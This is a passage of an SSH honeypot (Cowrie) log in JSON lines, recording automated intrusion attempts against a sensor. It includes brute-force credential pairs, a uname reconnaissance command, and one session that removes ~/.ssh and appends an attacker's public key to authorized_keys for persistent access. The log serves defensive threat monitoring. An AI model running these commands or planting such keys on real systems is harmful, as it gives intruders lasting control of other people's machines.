{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:48.763551Z","src_ip":"212.227.235.229","session":"cb95057465f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48868,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a87912918c8","protocol":"ssh","message":"New connection: 212.227.125.160:48868 (1.2.3.4:22) [session: 8a87912918c8]","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.243593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.244550Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.294951Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#$QWER","message":"login attempt [root/!@#$QWER] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.448254Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:31:56.612726Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.613405Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.665411Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:56.666555Z","src_ip":"212.227.125.160","session":"8a87912918c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:32:39.156080Z","src_ip":"79.124.8.120","session":"cf5710396db4"}
{"eventid":"cowrie.session.closed","duration":180.14539647102356,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:32:39.161727Z","src_ip":"79.124.8.120","session":"cf5710396db4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41558,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa35e3df3a4f","protocol":"ssh","message":"New connection: 212.227.235.229:41558 (1.2.3.4:22) [session: fa35e3df3a4f]","sensor":"my-vps","timestamp":"2025-08-26T02:33:01.852481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:33:01.853620Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:33:02.133482Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc112233","message":"login attempt [root/Abc112233] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:33:03.293713Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:33:03.874439Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:33:03.875229Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:33:03.876228Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:33:04.157592Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:33:04.820377Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:33:04.821066Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:33:05.103506Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:33:05.104406Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41606,"dst_ip":"1.2.3.4","dst_port":22,"session":"201ed1baa2a2","protocol":"ssh","message":"New connection: 212.227.235.229:41606 (1.2.3.4:22) [session: 201ed1baa2a2]","sensor":"my-vps","timestamp":"2025-08-26T02:33:05.384672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:33:05.385265Z","src_ip":"212.227.235.229","session":"201ed1baa2a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:33:05.667200Z","src_ip":"212.227.235.229","session":"201ed1baa2a2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:33:06.838793Z","src_ip":"212.227.235.229","session":"201ed1baa2a2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:33:08.121970Z","src_ip":"212.227.235.229","session":"201ed1baa2a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41616,"dst_ip":"1.2.3.4","dst_port":22,"session":"36a747f1fb31","protocol":"ssh","message":"New connection: 212.227.235.229:41616 (1.2.3.4:22) [session: 36a747f1fb31]","sensor":"my-vps","timestamp":"2025-08-26T02:33:08.377996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:33:08.378827Z","src_ip":"212.227.235.229","session":"36a747f1fb31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:33:08.637154Z","src_ip":"212.227.235.229","session":"36a747f1fb31"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:33:09.714700Z","src_ip":"212.227.235.229","session":"36a747f1fb31"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:33:09.975977Z","src_ip":"212.227.235.229","session":"36a747f1fb31"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:33:09.976810Z","src_ip":"212.227.235.229","session":"fa35e3df3a4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53746,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a9d5e5e1d6f","protocol":"ssh","message":"New connection: 212.227.125.160:53746 (1.2.3.4:22) [session: 3a9d5e5e1d6f]","sensor":"my-vps","timestamp":"2025-08-26T02:33:28.349566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:33:28.350427Z","src_ip":"212.227.125.160","session":"3a9d5e5e1d6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55742,"dst_ip":"1.2.3.4","dst_port":22,"session":"0521d01873bf","protocol":"ssh","message":"New connection: 212.227.235.229:55742 (1.2.3.4:22) [session: 0521d01873bf]","sensor":"my-vps","timestamp":"2025-08-26T02:34:22.449496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:34:22.450465Z","src_ip":"212.227.235.229","session":"0521d01873bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:34:22.731065Z","src_ip":"212.227.235.229","session":"0521d01873bf"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"teamspeak","message":"login attempt [teamspeak/teamspeak] failed","sensor":"my-vps","timestamp":"2025-08-26T02:34:23.896981Z","src_ip":"212.227.235.229","session":"0521d01873bf"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:34:25.182037Z","src_ip":"212.227.235.229","session":"0521d01873bf"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:35:28.371475Z","src_ip":"212.227.125.160","session":"3a9d5e5e1d6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55998,"dst_ip":"1.2.3.4","dst_port":22,"session":"00b65ad20fff","protocol":"ssh","message":"New connection: 212.227.235.229:55998 (1.2.3.4:22) [session: 00b65ad20fff]","sensor":"my-vps","timestamp":"2025-08-26T02:35:39.506281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:35:39.507140Z","src_ip":"212.227.235.229","session":"00b65ad20fff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:35:39.764667Z","src_ip":"212.227.235.229","session":"00b65ad20fff"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"P@ssw0rd","message":"login attempt [testuser/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T02:35:40.838511Z","src_ip":"212.227.235.229","session":"00b65ad20fff"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:35:42.099177Z","src_ip":"212.227.235.229","session":"00b65ad20fff"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":51674,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60213976ec8","protocol":"ssh","message":"New connection: 45.88.8.186:51674 (1.2.3.4:22) [session: c60213976ec8]","sensor":"my-vps","timestamp":"2025-08-26T02:36:24.468036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:36:25.031540Z","src_ip":"45.88.8.186","session":"c60213976ec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:36:25.032516Z","src_ip":"45.88.8.186","session":"c60213976ec8"}
{"eventid":"cowrie.login.success","username":"root","password":"Sepah@123","message":"login attempt [root/Sepah@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:36:28.109344Z","src_ip":"45.88.8.186","session":"c60213976ec8"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:36:28.775120Z","src_ip":"45.88.8.186","session":"c60213976ec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11930,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a06eba750ba","protocol":"ssh","message":"New connection: 212.227.235.229:11930 (1.2.3.4:22) [session: 8a06eba750ba]","sensor":"my-vps","timestamp":"2025-08-26T02:36:56.917660Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:36:56.920466Z","src_ip":"212.227.235.229","session":"8a06eba750ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12307,"dst_ip":"1.2.3.4","dst_port":22,"session":"617efb076ca2","protocol":"ssh","message":"New connection: 212.227.235.229:12307 (1.2.3.4:22) [session: 617efb076ca2]","sensor":"my-vps","timestamp":"2025-08-26T02:36:57.018193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:36:57.018948Z","src_ip":"212.227.235.229","session":"617efb076ca2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-c